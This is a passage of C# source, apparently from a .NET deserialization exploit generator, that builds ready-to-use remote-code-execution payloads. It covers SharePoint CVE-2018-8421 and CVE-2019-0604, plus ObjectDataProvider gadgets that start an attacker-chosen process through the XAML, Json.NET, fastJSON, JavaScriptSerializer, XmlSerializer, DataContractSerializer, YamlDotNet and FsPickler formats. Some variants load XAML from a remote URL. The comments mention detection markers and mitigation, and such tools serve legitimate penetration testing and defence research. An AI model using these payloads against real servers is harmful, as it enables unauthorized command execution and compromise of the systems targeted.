        /// <summary>
        /// Builds the SOAP request body for the CVE-2018-8421 SharePoint
        /// <c>ValidateWorkflowMarkupAndCreateSupportObjects</c> web-part-pages endpoint.
        /// The workflow markup inside the CDATA section is WPF XAML: in URL mode a
        /// <c>ResourceDictionary</c> whose <c>Source</c> attribute is <c>cmd</c>; otherwise an
        /// inline <c>ODP:ObjectDataProvider</c> with <c>MethodName="Start"</c> over a
        /// <c>Diag:Process</c> whose <c>StartInfo</c> carries the split command.
        /// </summary>
        /// <returns>The complete SOAP envelope; never null.</returns>
        /// <remarks>
        /// Reads the instance fields <c>useurl</c> and <c>cmd</c>. In URL mode <c>cmd</c> is
        /// concatenated into the <c>Source</c> attribute unchanged, i.e. it does not go through
        /// the XML-typed <c>CommandArgSplitter</c> path the inline mode uses. The constant
        /// parts (the SOAP action element, the workflow XAML namespace, the
        /// <c>ObjectDataProvider</c>/<c>MethodName="Start"</c> pair) are the stable markers a
        /// request-inspection rule would key on.
        /// </remarks>
        public string CVE_2018_8421()
        {
            if (useurl)
            {
                // Remote-resource variant: the ResourceDictionary is loaded from the URL held in cmd.
                return @"<?xml version=""1.0"" encoding=""utf-8""?>
<soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/""><soap:Body><ValidateWorkflowMarkupAndCreateSupportObjects xmlns=""http://microsoft.com/sharepoint/webpartpages""><workflowMarkupText><![CDATA[
<SequentialWorkflowActivity x:Class=""."" x:Name=""Workflow2"" xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml""
xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/workflow"">
<Rd:ResourceDictionary xmlns:Rd=""clr-namespace:System.Windows;Assembly=PresentationFramework,
Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"" Source=""" + cmd + @"""/>
</SequentialWorkflowActivity>
]]></workflowMarkupText>
<rulesText></rulesText><configBlob></configBlob><flag>2</flag></ValidateWorkflowMarkupAndCreateSupportObjects></soap:Body></soap:Envelope>";
            }

            // Inline variant: cmd is split into FileName (and optionally Arguments) for ProcessStartInfo.
            bool hasArgs;
            string[] parts = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs);

            // Opening tag only; the closing </Diag:ProcessStartInfo> lives in the template below.
            string startInfoElement = hasArgs
                ? @"<Diag:ProcessStartInfo FileName=""" + parts[0] + @""" Arguments=""" + parts[1] + @""">"
                : @"<Diag:ProcessStartInfo FileName=""" + parts[0] + @""">";

            // Returned as-is: minimising this payload is not required, though it could be done if needed.
            return @"<?xml version=""1.0"" encoding=""utf-8""?>
<soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/""><soap:Body><ValidateWorkflowMarkupAndCreateSupportObjects xmlns=""http://microsoft.com/sharepoint/webpartpages""><workflowMarkupText><![CDATA[
<SequentialWorkflowActivity x:Class=""."" x:Name=""Workflow2"" xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml""
xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/workflow"">
<Rd:ResourceDictionary xmlns:System=""clr-namespace:System;assembly=mscorlib, Version=4.0.0.0,    
Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:Diag=""clr-namespace:System.Diagnostics;assembly=System,
Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:Rd=""clr-namespace:System.Windows;Assembly=PresentationFramework,
Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"" xmlns:ODP=""clr-namespace:System.Windows.Data;Assembly=PresentationFramework, Version=4.0.0.0, Culture=neutral,    
PublicKeyToken=31bf3856ad364e35"">
<ODP:ObjectDataProvider x:Key=""LaunchCmd"" MethodName=""Start"">
<ObjectDataProvider.ObjectInstance><Diag:Process><Diag:Process.StartInfo>" + startInfoElement + @"</Diag:ProcessStartInfo></Diag:Process.StartInfo></Diag:Process>
</ObjectDataProvider.ObjectInstance>
</ODP:ObjectDataProvider>
</Rd:ResourceDictionary>
</SequentialWorkflowActivity>
]]></workflowMarkupText>
<rulesText></rulesText><configBlob></configBlob><flag>2</flag></ValidateWorkflowMarkupAndCreateSupportObjects></soap:Body></soap:Envelope>";
        }
        /// <summary>
        /// Builds the CVE-2019-0604 SharePoint payload: an XmlSerializer-typed
        /// <c>ExpandedWrapper`2[XamlReader, ObjectDataProvider]</c> document whose
        /// <c>ProjectedProperty0</c> calls <c>XamlReader.Parse</c> on an embedded
        /// <c>ResourceDictionary</c> holding an <c>ObjectDataProvider</c> that starts
        /// <c>System.Diagnostics.Process</c>. The result is the <c>__bp</c>-prefixed,
        /// hex-encoded form the vulnerable endpoint accepts.
        /// </summary>
        /// <returns>"__bp" followed by a hex-encoded length prefix and the hex-encoded payload.</returns>
        /// <remarks>
        /// Reads the instance field <c>cmd</c>. The length prefix is <c>payload.Length &lt;&lt; 2</c>
        /// narrowed to a <see cref="char"/> inside a <c>checked</c> context, so a combined payload
        /// longer than 16383 characters throws <see cref="OverflowException"/> instead of wrapping.
        /// The assembly-qualified <c>ExpandedWrapper`2</c> type prefix and the
        /// <c>XamlReader</c>/<c>ObjectDataProvider</c> pair are the markers to match on when
        /// inspecting such requests.
        /// </remarks>
        public string CVE_2019_0604()
        {
            bool hasArgs;
            string[] parts = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs);

            // One or two b:String entries; the closing </ObjectDataProvider.MethodParameters> is in the outer template.
            string methodParameters = hasArgs
                ? $@"<ObjectDataProvider.MethodParameters><b:String>{parts[0]}</b:String><b:String>{parts[1]}</b:String>"
                : $@"<ObjectDataProvider.MethodParameters><b:String>{parts[0]}</b:String>";

            // Type prefix the endpoint uses to pick the root type for XmlSerializer.
            string typePrefix = @"System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35]],System.Data.Services,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089:";

            // NOTE(review): this literal is NOT interpolated, so the doubled braces in
            // ObjectType=""{{d:Type c:Process}}"" are emitted literally, unlike the $@ templates in
            // Generate() which collapse them to {d:Type c:Process} - confirm that PayloadMinifier
            // or the consumer tolerates the doubled form.
            string xmlDocument = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://www.w3.org/2001/XMLSchema""><ExpandedElement/><ProjectedProperty0><MethodName>Parse</MethodName><MethodParameters><anyType a:type=""b:string""><![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">" + methodParameters + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]></anyType></MethodParameters><ObjectInstance a:type=""XamlReader""/></ProjectedProperty0></ExpandedWrapperOfXamlReaderObjectDataProvider>";

            // Hex encoding doubles the size, so the XML is minified before encoding.
            xmlDocument = PayloadMinifier(xmlDocument);

            string combined = typePrefix + xmlDocument;

            var encoded = new StringBuilder("__bp");
            // Length prefix: (length << 2) as a single char, overflow-checked.
            HexEncode(checked((char)(combined.Length << 2)), encoded);
            HexEncode(combined, encoded);

            return encoded.ToString();
        }
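        /// <summary>
        /// Produces the ObjectDataProvider gadget in the syntax of the requested <paramref name="formatter"/>.
        /// Every branch describes the same object graph - <c>System.Windows.Data.ObjectDataProvider</c> with
        /// <c>MethodName="Start"</c> over a <c>System.Diagnostics.Process</c> whose <c>StartInfo</c> carries
        /// <c>inputArgs.CmdFileName</c> / <c>CmdArguments</c> - optionally minifies it, and, when
        /// <c>inputArgs.Test</c> is set, deserializes it locally with the matching helper.
        /// </summary>
        /// <param name="formatter">Formatter name; matched case-insensitively using the invariant culture.</param>
        /// <param name="inputArgs">Command, variant and minify/test switches. Mutated by this method:
        /// <c>CmdType</c> is set per branch and <c>IsSTAThread</c> is forced on for xaml variant 4.</param>
        /// <returns>The serialized gadget: a <see cref="string"/> for every formatter except
        /// "sharpserializerbinary", which returns whatever
        /// <c>SerializersHelper.SharpSerializer_ObjectDataProvider_Binary_Serialize</c> produces.</returns>
        /// <exception cref="ArgumentNullException"><paramref name="formatter"/> or <paramref name="inputArgs"/> is null.</exception>
        /// <exception cref="NotSupportedException">The formatter name is not one handled here.</exception>
        /// <remarks>
        /// Detection note: across all variants the stable surface is the assembly-qualified type name
        /// <c>System.Windows.Data.ObjectDataProvider, PresentationFramework</c> next to <c>MethodName</c>/<c>Start</c>
        /// and <c>System.Diagnostics.Process</c> inside serialized input; the mitigation is a deserializer
        /// configuration that does not let the document choose types (no type-name handling / type attributes).
        /// Note that xaml variant 3 calls <c>System.Environment.Exit(-1)</c> when no URL was given, which ends
        /// the whole process rather than throwing.
        /// </remarks>
        public override object Generate(string formatter, InputArgs inputArgs)
        {
            if (formatter == null)
            {
                throw new ArgumentNullException(nameof(formatter));
            }
            if (inputArgs == null)
            {
                throw new ArgumentNullException(nameof(inputArgs));
            }

            // Invariant lower-casing once: the culture-sensitive ToLower() most branches used folds 'I'
            // differently under e.g. tr-TR, so an upper-cased "XMLSERIALIZER" could fall through to the
            // "not supported" error. The sharpserializer branches already used ToLowerInvariant().
            string formatterName = formatter.ToLowerInvariant();

            // NOTE: What is Xaml2? Xaml2 uses ResourceDictionary in addition to just using ObjectDataProvider as in Xaml
            if (formatterName == "xaml")
            {
                ProcessStartInfo psi = new ProcessStartInfo();

                psi.FileName = inputArgs.CmdFileName;
                if (inputArgs.HasArguments)
                {
                    psi.Arguments = inputArgs.CmdArguments;
                }

                // The private environmentVariables field is replaced with an empty StringDictionary -
                // presumably so the serialized StartInfo does not carry this process's environment; confirm.
                StringDictionary dict = new StringDictionary();
                psi.GetType().GetField("environmentVariables", BindingFlags.Instance | BindingFlags.NonPublic).SetValue(psi, dict);
                Process p = new Process();
                p.StartInfo = psi;
                ObjectDataProvider odp = new ObjectDataProvider();
                odp.MethodName           = "Start";
                odp.IsInitialLoadEnabled = false;
                odp.ObjectInstance       = p;

                // Serializer-emitted attributes the gadget does not need; stripped when minifying
                // (used both for the variant-4 bridge and for the final payload).
                string[] xamlDiscardPatterns = new String[] { @"StandardErrorEncoding=.*LoadUserProfile=""False"" ", @"IsInitialLoadEnabled=""False"" " };

                string payload = "";

                if (variant_number == 2)
                {
                    ResourceDictionary myResourceDictionary = new ResourceDictionary();
                    myResourceDictionary.Add("", odp);
                    // XAML serializer can also be exploited!
                    payload = SerializersHelper.Xaml_serialize(myResourceDictionary);
                }
                else if (variant_number == 3)
                {
                    if (xaml_url == "")
                    {
                        Console.WriteLine("Url parameter was not provided.");
                        Console.WriteLine("Try 'ysoserial --fullhelp' for more information.");
                        // CLI behaviour kept: this terminates the process, it does not throw.
                        System.Environment.Exit(-1);
                    }

                    // There are loads of other objects in Presentation that use XAML URLs and they can be used here instead
                    payload = @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" Source=""" + xaml_url + @"""/>";
                }
                else if (variant_number == 4)
                {
                    inputArgs.IsSTAThread = true; // we need STAThreadAttribute here
                    string bridge = SerializersHelper.Xaml_serialize(odp);

                    if (inputArgs.Minify)
                    {
                        // using discardable regex array to make it shorter!
                        bridge = XMLMinifier.Minify(bridge, null, xamlDiscardPatterns);
                    }

                    // There are loads of other objects in Presentation that use ResourceDictionary and they can all be used here instead
                    // The inner XAML is attribute-escaped because it is embedded as an attribute value.
                    payload = @"<WorkflowDesigner xmlns=""clr-namespace:System.Activities.Presentation;assembly=System.Activities.Presentation"" PropertyInspectorFontAndColorData=""" + CommandArgSplitter.XmlStringAttributeEscape(bridge) + @"""/>";
                }
                else
                {
                    //payload = XamlWriter.Save(odp);
                    payload = SerializersHelper.Xaml_serialize(odp);
                }

                if (inputArgs.Minify)
                {
                    // using discardable regex array to make it shorter!
                    payload = XMLMinifier.Minify(payload, null, xamlDiscardPatterns);
                }

                if (inputArgs.Test)
                {
                    if (inputArgs.IsSTAThread)
                    {
                        // Deserialize on a dedicated STA thread (required by variant 4, see above).
                        var staThread = new System.Threading.Thread(delegate()
                        {
                            try {
                                SerializersHelper.Xaml_deserialize(payload);
                            }
                            catch (Exception err)
                            {
                                Debugging.ShowErrors(inputArgs, err);
                            }
                        });
                        staThread.SetApartmentState(System.Threading.ApartmentState.STA);
                        staThread.Start();
                        staThread.Join();
                    }
                    else
                    {
                        try
                        {
                            SerializersHelper.Xaml_deserialize(payload);
                        }
                        catch (Exception err)
                        {
                            Debugging.ShowErrors(inputArgs, err);
                        }
                    }
                }
                return(payload);
            }
            else if (formatterName == "json.net")
            {
                // Json.NET with TypeNameHandling: $type selects the types, MethodParameters is an ArrayList.
                inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;

                string cmdPart = "";

                if (inputArgs.HasArguments)
                {
                    cmdPart = "'" + inputArgs.CmdFileName + "', '" + inputArgs.CmdArguments + "'";
                }
                else
                {
                    cmdPart = "'" + inputArgs.CmdFileName + "'";
                }

                String payload = @"{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':[" + cmdPart + @"]
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}";
                if (inputArgs.Minify)
                {
                    if (inputArgs.UseSimpleType)
                    {
                        // Assembly names that the minifier may shorten in $type values.
                        payload = JSONMinifier.Minify(payload, new String[] { "PresentationFramework", "mscorlib", "System" }, null);
                    }
                    else
                    {
                        payload = JSONMinifier.Minify(payload, null, null);
                    }
                }

                if (inputArgs.Test)
                {
                    try
                    {
                        SerializersHelper.JsonNet_deserialize(payload);
                    }
                    catch (Exception err)
                    {
                        Debugging.ShowErrors(inputArgs, err);
                    }
                }
                return(payload);
            }
            else if (formatterName == "fastjson")
            {
                // fastJSON: $types table maps numbered aliases to assembly-qualified names.
                inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;

                String cmdPart;

                if (inputArgs.HasArguments)
                {
                    cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @""",""Arguments"":""" + inputArgs.CmdArguments + @"""";
                }
                else
                {
                    cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @"""";
                }

                String payload = @"{
    ""$types"":{
        ""System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35"":""1"",
        ""System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""2"",
        ""System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""3""
    },
    ""$type"":""1"",
    ""ObjectInstance"":{
        ""$type"":""2"",
        ""StartInfo"":{
            ""$type"":""3"",
            " + cmdPart + @"
        }
    },
    ""MethodName"":""Start""
}";

                if (inputArgs.Minify)
                {
                    payload = JSONMinifier.Minify(payload, null, null);
                }

                if (inputArgs.Test)
                {
                    try
                    {
                        // Result intentionally discarded; only the deserialization side effect is exercised.
                        JSON.ToObject <Object>(payload);
                    }
                    catch (Exception err)
                    {
                        Debugging.ShowErrors(inputArgs, err);
                    }
                }
                return(payload);
            }
            else if (formatterName == "javascriptserializer")
            {
                // JavaScriptSerializer with a type resolver: __type selects the types.
                inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;

                String cmdPart;

                if (inputArgs.HasArguments)
                {
                    cmdPart = "'FileName':'" + inputArgs.CmdFileName + "', 'Arguments':'" + inputArgs.CmdArguments + "'";
                }
                else
                {
                    cmdPart = "'FileName':'" + inputArgs.CmdFileName + "'";
                }

                String payload = @"{
    '__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 
    'MethodName':'Start',
    'ObjectInstance':{
        '__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        'StartInfo': {
            '__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
            " + cmdPart + @"
        }
    }
}";

                if (inputArgs.Minify)
                {
                    payload = JSONMinifier.Minify(payload, null, null);
                }

                if (inputArgs.Test)
                {
                    try
                    {
                        SerializersHelper.JavaScriptSerializer_deserialize(payload);
                    }
                    catch (Exception err)
                    {
                        Debugging.ShowErrors(inputArgs, err);
                    }
                }
                return(payload);
            }
            else if (formatterName == "xmlserializer")
            {
                // XmlSerializer via ExpandedWrapper`2[XamlReader, ObjectDataProvider]: ProjectedProperty0 calls
                // XamlReader.Parse on the ResourceDictionary held in the CDATA section.
                inputArgs.CmdType = CommandArgSplitter.CommandType.XML;

                String cmdPart;

                if (inputArgs.HasArguments)
                {
                    cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
                }
                else
                {
                    cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
                }

                String payload = $@"<?xml version=""1.0""?>
<root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
    <ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" >
        <ExpandedElement/>
        <ProjectedProperty0>
            <MethodName>Parse</MethodName>
            <MethodParameters>
                <anyType xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xsi:type=""xsd:string"">
                    <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
                </anyType>
            </MethodParameters>
            <ObjectInstance xsi:type=""XamlReader""></ObjectInstance>
        </ProjectedProperty0>
    </ExpandedWrapperOfXamlReaderObjectDataProvider>
</root>
";

                if (inputArgs.Minify)
                {
                    payload = XMLMinifier.Minify(payload, null, null, FormatterType.XMLSerializer, true);
                }


                if (inputArgs.Test)
                {
                    try
                    {
                        SerializersHelper.XMLSerializer_deserialize(payload, null, "root", "type");
                    }
                    catch (Exception err)
                    {
                        Debugging.ShowErrors(inputArgs, err);
                    }
                }
                return(payload);
            }
            else if (formatterName == "datacontractserializer")
            {
                // DataContractSerializer: variants 2 and 3 use the XamlReader.Parse wrapper, the default
                // variant puts the Process directly into ExpandedElement and calls Start on it by z:Ref.
                // Variant 3 ships the literal placeholder "xxxxx" instead of the command (kept as found).
                inputArgs.CmdType = CommandArgSplitter.CommandType.XML;

                String cmdPart, payload;

                if (variant_number == 2)
                {
                    if (inputArgs.HasArguments)
                    {
                        cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
                    }
                    else
                    {
                        cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
                    }

                    payload = $@"<?xml version=""1.0""?>
<root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
    <ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"">
      <ExpandedElement z:Id=""ref1"" >
        <__identity xsi:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/>
      </ExpandedElement>
        <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data"">
            <a:MethodName>Parse</a:MethodName>
            <a:MethodParameters>
                <anyType xsi:type=""xsd:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">
                    <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
                </anyType>
            </a:MethodParameters>
            <a:ObjectInstance z:Ref=""ref1""/>
        </ProjectedProperty0>
    </ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW>
</root>
";
                }
                else if (variant_number == 3)
                {
                    payload = $@"<?xml version=""1.0""?>
<root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
    <ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"">
      <ExpandedElement z:Id=""ref1"" >
        <__identity xsi:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/>
      </ExpandedElement>
        <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data"">
            <a:MethodName>Parse</a:MethodName>
            <a:MethodParameters>
                <anyType xsi:type=""xsd:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">
                    <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">xxxxx</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
                </anyType>
            </a:MethodParameters>
            <a:ObjectInstance z:Ref=""ref1""/>
        </ProjectedProperty0>
    </ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW>
</root>
";
                }
                else
                {
                    if (inputArgs.HasArguments)
                    {
                        cmdPart = $@"<b:anyType i:type=""c:string"">" + inputArgs.CmdFileName + @"</b:anyType>
          <b:anyType i:type=""c:string"">" + inputArgs.CmdArguments + "</b:anyType>";
                    }
                    else
                    {
                        cmdPart = $@"<anyType i:type=""c:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">" + inputArgs.CmdFileName + @"</anyType>";
                    }

                    payload = $@"<?xml version=""1.0""?>
<root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]],System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
    <ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" 
                                                         xmlns:c=""http://www.w3.org/2001/XMLSchema""
                                                         xmlns:i=""http://www.w3.org/2001/XMLSchema-instance""
                                                         xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/""
                                                         >
      <ExpandedElement z:Id=""ref1"" >
        <__identity i:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/>
      </ExpandedElement>
      <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data"">
        <a:MethodName>Start</a:MethodName>
        <a:MethodParameters xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">
          " + cmdPart + @"
        </a:MethodParameters>
        <a:ObjectInstance z:Ref=""ref1""/>
      </ProjectedProperty0>
    </ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL>
</root>
";
                }
                if (inputArgs.Minify)
                {
                    payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true);
                }

                if (inputArgs.Test)
                {
                    try
                    {
                        SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type");
                    }
                    catch (Exception err)
                    {
                        Debugging.ShowErrors(inputArgs, err);
                    }
                }
                return(payload);
            }
            else if (formatterName == "yamldotnet")
            {
                // YamlDotNet: "!<!type>" tags select the types. Leading tabs inside the literal are part of the document.
                inputArgs.CmdType = CommandArgSplitter.CommandType.YamlDotNet;

                String cmdPart;

                if (inputArgs.HasArguments)
                {
                    cmdPart = $@"FileName: " + inputArgs.CmdFileName + @",
					Arguments: "                     + inputArgs.CmdArguments;
                }
                else
                {
                    cmdPart = $@"FileName: " + inputArgs.CmdFileName;
                }

                String payload = @"
!<!System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35> {
    MethodName: Start,
	ObjectInstance: 
		!<!System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> {
			StartInfo:
				!<!System.Diagnostics.ProcessStartInfo,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> {
					"                     + cmdPart + @"

                }
        }
}";

                if (inputArgs.Minify)
                {
                    payload = YamlDocumentMinifier.Minify(payload);
                }

                if (inputArgs.Test)
                {
                    try
                    {
                        SerializersHelper.YamlDotNet_deserialize(payload);
                    }
                    catch (Exception err)
                    {
                        Debugging.ShowErrors(inputArgs, err);
                    }
                }
                return(payload);
            }
            else if (formatterName == "fspickler")
            {
                // FsPickler JSON: the XAML ResourceDictionary is JSON-escaped and carried as the ForegroundBrush
                // string of a TextFormattingRunProperties instance.
                inputArgs.CmdType = CommandArgSplitter.CommandType.XML;

                String cmdPart;

                if (inputArgs.HasArguments)
                {
                    cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
                }
                else
                {
                    cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
                }

                String internalPayload = @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{d:Type c:Process}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>";

                // Escaped because it is embedded inside a JSON string value below.
                internalPayload = CommandArgSplitter.JsonStringEscape(internalPayload);

                String payload = @"{
  ""FsPickler"": ""4.0.0"",
  ""type"": ""System.Object"",
  ""value"": {
          ""_flags"": ""subtype"",
          ""subtype"": {
            ""Case"": ""NamedType"",
            ""Name"": ""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"",
            ""Assembly"": {
              ""Name"": ""Microsoft.PowerShell.Editor"",
              ""Version"": ""3.0.0.0"",
              ""Culture"": ""neutral"",
              ""PublicKeyToken"": ""31bf3856ad364e35""
            }
          },
          ""instance"": {
            ""serializationEntries"": [
              {
                ""Name"": ""ForegroundBrush"",
                ""Type"": {
                  ""Case"": ""NamedType"",
                  ""Name"": ""System.String"",
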